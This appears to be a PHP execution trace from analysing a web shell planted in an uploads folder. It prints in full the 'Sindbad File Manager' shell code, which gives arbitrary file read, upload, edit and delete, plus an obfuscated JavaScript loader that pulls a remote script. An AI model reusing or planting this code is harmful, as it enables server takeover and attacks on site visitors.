3 13 R '<?php\necho \'<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href="" rel="stylesheet" type="text/css">\n<title>D.R.S Dz</title>\n<style>\nbody{\nfont-family: "Racing Sans One", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont'
3 14 0 0.001470 462088 eval 1 '?><?php\necho \'<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href="" rel="stylesheet" type="text/css">\n<title>D.R.S Dz</title>\n<style>\nbody{\nfont-family: "Racing Sans One", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: "Rye", cursive;\n}\na{\ncolor: #000;\ntext-decoration: none;\n}\na:hover{\ncolor: #fff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center>Sindbad~EG File Manager</center></H1>\n<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\n<tr><td>Current Path : \';\nif(isset($_GET[\'path\'])){\n$path = $_GET[\'path\'];\n}else{\n$path = getcwd();\n}\n$path = str_replace(\'\\\\\',\'/\',$path);\n$paths = explode(\'/\',$path);\n\nforeach($paths as $id=>$pat){\nif($pat == \'\' && $id == 0){\n$a = true;\necho \'<a href="?path=/">/</a>\';\ncontinue;\n}\nif($pat == \'\') continue;\necho \'<a href="?path=\';\nfor($i=0;$i<=$id;$i++){\necho "$paths[$i]";\nif($i != $id) echo "/";\n}\necho \'">\'.$pat.\'</a>/\';\n}\necho \'</td></tr><tr><td>\';\nif(isset($_FILES[\'file\'])){\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\necho \'<font color="green">File Upload Done.</font><br />\';\n}else{\necho \'<font color="red">File Upload Error.</font><br />\';\n}\n}\necho \'<form enctype="multipart/form-data" method="POST">\nUpload File : <input type="file" name="file" />\n<input type="submit" value="upload" />\n</form>\n</td></tr>\';\nif(isset($_GET[\'filesrc\'])){\necho "<tr><td>Current File : ";\necho $_GET[\'filesrc\'];\necho \'</tr></td></table><br />\';\necho(\'<pre>\'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</pre>\');\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\nif($_POST[\'opt\'] == \'chmod\'){\nif(isset($_POST[\'perm\'])){\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\necho \'<font color="green">Change Permission Done.</font><br />\';\n}else{\necho \'<font color="red">Change Permission Error.</font><br />\';\n}\n}\necho \'<form method="POST">\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\n<input type="hidden" name="opt" value="chmod">\n<input type="submit" value="Go" />\n</form>\';\n}elseif($_POST[\'opt\'] == \'rename\'){\nif(isset($_POST[\'newname\'])){\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\necho \'<font color="green">Change Name Done.</font><br />\';\n}else{\necho \'<font color="red">Change Name Error.</font><br />\';\n}\n$_POST[\'name\'] = $_POST[\'newname\'];\n}\necho \'<form method="POST">\nNew Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\n<input type="hidden" name="opt" value="rename">\n<input type="submit" value="Go" />\n</form>\';\n}elseif($_POST[\'opt\'] == \'edit\'){\nif(isset($_POST[\'src\'])){\n$fp = fopen($_POST[\'path\'],\'w\');\nif(fwrite($fp,$_POST[\'src\'])){\necho \'<font color="green">Edit File Done.</font><br />\';\n}else{\necho \'<font color="red">Edit File Error.</font><br />\';\n}\nfclose($fp);\n}\necho \'<form method="POST">\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\n<input type="hidden" name="opt" value="edit">\n<input type="submit" value="Go" />\n</form>\';\n}\necho \'</center>\';\n}else{\necho \'</table><br /><center>\';\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\nif($_POST[\'type\'] == \'dir\'){\nif(rmdir($_POST[\'path\'])){\necho \'<font color="green">Delete Dir Done.</font><br />\';\n}else{\necho \'<font color="red">Delete Dir Error.</font><br />\';\n}\n}elseif($_POST[\'type\'] == \'file\'){\nif(unlink($_POST[\'path\'])){\necho \'<font color="green">Delete File Done.</font><br />\';\n}else{\necho \'<font color="red">Delete File Error.</font><br />\';\n}\n}\n}\necho \'</center>\';\n$scandir = scandir($path);\necho \'<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\n<tr class="first">\n<td><center>Name</center></td>\n<td><center>Size</center></td>\n<td><center>Permissions</center></td>\n<td><center>Options</center></td>\n</tr>\';\n\nforeach($scandir as $dir){\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\necho "<tr>\n<td><a href=\\"?path=$path/$dir\\">$dir</a></td>\n<td><center>--</center></td>\n<td><center>";\nif(is_writable("$path/$dir")) echo \'<font color="green">\';\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\necho perms("$path/$dir");\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\n\necho "</center></td>\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\n<select name=\\"opt\\">\n<option value=\\"\\"></option>\n<option value=\\"delete\\">Delete</option>\n<option value=\\"chmod\\">Chmod</option>\n<option value=\\"rename\\">Rename</option>\n</select>\n<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\">\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">\n<input type=\\"submit\\" value=\\">\\" />\n</form></center></td>\n</tr>";\n}\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\nforeach($scandir as $file){\nif(!is_file("$path/$file")) continue;\n$size = filesize("$path/$file")/1024;\n$size = round($size,3);\nif($size >= 1024){\n$size = round($size/1024,2).\' MB\';\n}else{\n$size = $size.\' KB\';\n}\n\necho "<tr>\n<td><a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td>\n<td><center>".$size."</center></td>\n<td><center>";\nif(is_writable("$path/$file")) echo \'<font color="green">\';\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\necho perms("$path/$file");\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\necho "</center></td>\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\n<select name=\\"opt\\">\n<option value=\\"\\"></option>\n<option value=\\"delete\\">Delete</option>\n<option value=\\"chmod\\">Chmod</option>\n<option value=\\"rename\\">Rename</option>\n<option value=\\"edit\\">Edit</option>\n</select>\n<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\">\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">\n<input type=\\"submit\\" value=\\">\\" />\n</form></center></td>\n</tr>";\n}\necho \'</table>\n</div>\';\n}\necho \'<br />Sindbad File Manager Version <font color="red">1.0</font>, Coded By <font color="red">Sindbad EG ~ The Terrorists</font>\n</BODY>\n</HTML>\';\nfunction perms($file){\n$perms = fileperms($file);\n\nif (($perms & 0xC000) == 0xC000) {\n// Socket\n$info = \'s\';\n} elseif (($perms & 0xA000) == 0xA000) {\n// Symbolic Link\n$info = \'l\';\n} elseif (($perms & 0x8000) == 0x8000) {\n// Regular\n$info = \'-\';\n} elseif (($perms & 0x6000) == 0x6000) {\n// Block special\n$info = \'b\';\n} elseif (($perms & 0x4000) == 0x4000) {\n// Directory\n$info = \'d\';\n} elseif (($perms & 0x2000) == 0x2000) {\n// Character special\n$info = \'c\';\n} elseif (($perms & 0x1000) == 0x1000) {\n// FIFO pipe\n$info = \'p\';\n} else {\n// Unknown\n$info = \'u\';\n}\n\n// Owner\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\n$info .= (($perms & 0x0040) ?\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\n(($perms & 0x0800) ? \'S\' : \'-\'));\n\n// Group\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\n$info .= (($perms & 0x0008) ?\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\n(($perms & 0x0400) ? \'S\' : \'-\'));\n\n// World\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\n$info .= (($perms & 0x0001) ?\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\n(($perms & 0x0200) ? \'T\' : \'-\'));\n\nreturn $info;\n}\n?>\n<script language=javascript>document.write(unescape(\'%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E\'));dF(\'%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%264F%26311\')</script>' /var/www/html/uploads/minipriv.php(4) : eval()'d code 1 0
4 15 0 0.001686 462088 getcwd 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 53 0
4 15 1 0.001703 462136
4 15 R '/var/www/html/uploads'
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 53 $path = '/var/www/html/uploads'
4 16 0 0.001732 462136 str_replace 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 55 3 '\\' '/' '/var/www/html/uploads'
4 16 1 0.001749 462232
4 16 R '/var/www/html/uploads'
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 55 $path = '/var/www/html/uploads'
4 17 0 0.001775 462136 explode 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 56 2 '/' '/var/www/html/uploads'
4 17 1 0.001791 462712
4 17 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 56 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 58 $id = 0
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 60 $a = TRUE
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 58 $id = 1
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i = 0
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 58 $id = 2
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i = 0
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 58 $id = 3
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i = 0
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 58 $id = 4
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i = 0
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 66 $i++
4 18 0 0.002055 462640 scandir 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 157 1 '/var/www/html/uploads'
4 18 1 0.002089 463264
4 18 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'minipriv.php', 5 => 'prepend.php']
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 157 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'minipriv.php', 5 => 'prepend.php']
4 19 0 0.002129 463280 is_dir 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 167 1 '/var/www/html/uploads/.'
4 19 1 0.002147 463344
4 19 R TRUE
4 20 0 0.002161 463312 is_dir 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 167 1 '/var/www/html/uploads/..'
4 20 1 0.002177 463360
4 20 R TRUE
4 21 0 0.002190 463320 is_dir 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 167 1 '/var/www/html/uploads/.htaccess'
4 21 1 0.002206 463360
4 21 R FALSE
4 22 0 0.002219 463320 is_dir 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 167 1 '/var/www/html/uploads/data'
4 22 1 0.002234 463360
4 22 R TRUE
4 23 0 0.002248 463320 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 172 1 '/var/www/html/uploads/data'
4 23 1 0.002266 463360
4 23 R TRUE
4 24 0 0.002279 463320 perms 1 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 174 1 '/var/www/html/uploads/data'
5 25 0 0.002293 463320 fileperms 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 1 '/var/www/html/uploads/data'
5 25 1 0.002307 463360
5 25 R 16895
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 $perms = 16895
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 250 $info = 'd'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 263 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 264 $info .= 'w'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 267 $info .= 'x'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 270 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 271 $info .= 'w'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 274 $info .= 'x'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 277 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 278 $info .= 'w'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 281 $info .= 'x'
4 24 1 0.002438 463360
4 24 R 'drwxrwxrwx'
4 26 0 0.002452 463320 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 175 1 '/var/www/html/uploads/data'
4 26 1 0.002468 463360
4 26 R TRUE
4 27 0 0.002481 463328 is_dir 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 167 1 '/var/www/html/uploads/minipriv.php'
4 27 1 0.002497 463376
4 27 R FALSE
4 28 0 0.002510 463336 is_dir 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 167 1 '/var/www/html/uploads/prepend.php'
4 28 1 0.002526 463376
4 28 R FALSE
4 29 0 0.002540 463320 is_file 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 194 1 '/var/www/html/uploads/.'
4 29 1 0.002555 463344
4 29 R FALSE
4 30 0 0.002568 463312 is_file 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 194 1 '/var/www/html/uploads/..'
4 30 1 0.002583 463360
4 30 R FALSE
4 31 0 0.002596 463320 is_file 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 194 1 '/var/www/html/uploads/.htaccess'
4 31 1 0.002611 463360
4 31 R TRUE
4 32 0 0.002624 463320 filesize 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 195 1 '/var/www/html/uploads/.htaccess'
4 32 1 0.002638 463360
4 32 R 64
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 195 $size = 0.0625
4 33 0 0.002667 463264 round 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 196 2 0.0625 3
4 33 1 0.002682 463336
4 33 R 0.063
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 196 $size = 0.063
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 200 $size = '0.063 KB'
4 34 0 0.002720 463360 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 207 1 '/var/www/html/uploads/.htaccess'
4 34 1 0.002737 463400
4 34 R FALSE
4 35 0 0.002749 463360 is_readable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 208 1 '/var/www/html/uploads/.htaccess'
4 35 1 0.002765 463400
4 35 R TRUE
4 36 0 0.002778 463360 perms 1 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 209 1 '/var/www/html/uploads/.htaccess'
5 37 0 0.002792 463360 fileperms 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 1 '/var/www/html/uploads/.htaccess'
5 37 1 0.002805 463400
5 37 R 33188
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 $perms = 33188
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 244 $info = '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 263 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 264 $info .= 'w'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 267 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 270 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 271 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 274 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 277 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 278 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 281 $info .= '-'
4 36 1 0.002933 463400
4 36 R '-rw-r--r--'
4 38 0 0.002947 463360 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 210 1 '/var/www/html/uploads/.htaccess'
4 38 1 0.002964 463400
4 38 R FALSE
4 39 0 0.002977 463360 is_readable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 210 1 '/var/www/html/uploads/.htaccess'
4 39 1 0.002992 463400
4 39 R TRUE
4 40 0 0.003006 463360 is_file 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 194 1 '/var/www/html/uploads/data'
4 40 1 0.003021 463400
4 40 R FALSE
4 41 0 0.003034 463368 is_file 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 194 1 '/var/www/html/uploads/minipriv.php'
4 41 1 0.003049 463416
4 41 R TRUE
4 42 0 0.003062 463376 filesize 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 195 1 '/var/www/html/uploads/minipriv.php'
4 42 1 0.003075 463416
4 42 R 3693
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 195 $size = 3.6064453125
4 43 0 0.003100 463272 round 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 196 2 3.6064453125 3
4 43 1 0.003114 463344
4 43 R 3.606
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 196 $size = 3.606
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 200 $size = '3.606 KB'
4 44 0 0.003150 463376 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 207 1 '/var/www/html/uploads/minipriv.php'
4 44 1 0.003167 463416
4 44 R FALSE
4 45 0 0.003179 463376 is_readable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 208 1 '/var/www/html/uploads/minipriv.php'
4 45 1 0.003195 463416
4 45 R TRUE
4 46 0 0.003207 463376 perms 1 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 209 1 '/var/www/html/uploads/minipriv.php'
5 47 0 0.003221 463376 fileperms 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 1 '/var/www/html/uploads/minipriv.php'
5 47 1 0.003234 463416
5 47 R 33204
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 $perms = 33204
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 244 $info = '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 263 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 264 $info .= 'w'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 267 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 270 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 271 $info .= 'w'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 274 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 277 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 278 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 281 $info .= '-'
4 46 1 0.003366 463416
4 46 R '-rw-rw-r--'
4 48 0 0.003379 463376 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 210 1 '/var/www/html/uploads/minipriv.php'
4 48 1 0.003396 463416
4 48 R FALSE
4 49 0 0.003409 463376 is_readable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 210 1 '/var/www/html/uploads/minipriv.php'
4 49 1 0.003424 463416
4 49 R TRUE
4 50 0 0.003438 463376 is_file 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 194 1 '/var/www/html/uploads/prepend.php'
4 50 1 0.003454 463416
4 50 R TRUE
4 51 0 0.003466 463376 filesize 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 195 1 '/var/www/html/uploads/prepend.php'
4 51 1 0.003480 463416
4 51 R 57
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 195 $size = 0.0556640625
4 52 0 0.003504 463272 round 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 196 2 0.0556640625 3
4 52 1 0.003519 463344
4 52 R 0.056
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 196 $size = 0.056
3 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 200 $size = '0.056 KB'
4 53 0 0.003555 463376 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 207 1 '/var/www/html/uploads/prepend.php'
4 53 1 0.003571 463416
4 53 R FALSE
4 54 0 0.003584 463376 is_readable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 208 1 '/var/www/html/uploads/prepend.php'
4 54 1 0.003600 463416
4 54 R TRUE
4 55 0 0.003612 463376 perms 1 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 209 1 '/var/www/html/uploads/prepend.php'
5 56 0 0.003626 463376 fileperms 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 1 '/var/www/html/uploads/prepend.php'
5 56 1 0.003640 463416
5 56 R 33261
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 234 $perms = 33261
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 244 $info = '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 263 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 264 $info .= 'w'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 267 $info .= 'x'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 270 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 271 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 274 $info .= 'x'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 277 $info .= 'r'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 278 $info .= '-'
4 A /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 281 $info .= 'x'
4 55 1 0.003766 463416
4 55 R '-rwxr-xr-x'
4 57 0 0.003780 463376 is_writable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 210 1 '/var/www/html/uploads/prepend.php'
4 57 1 0.003796 463416
4 57 R FALSE
4 58 0 0.003809 463376 is_readable 0 /var/www/html/uploads/minipriv.php(4) : eval()'d code(1) : eval()'d code 210 1 '/var/www/html/uploads/prepend.php'
4 58 1 0.003825 463416
4 58 R TRUE
3 14 1 0.003844 463424
2 8 1 0.003856 425776
1 3 1 0.003863 423984
0.003887 342856
TRACE END [2023-02-13 02:12:03.523360]
Generated HTML code
<html><head>
<link href="" rel="stylesheet" type="text/css">
<title>D.R.S Dz</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
<h1><center>Sindbad~EG File Manager</center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
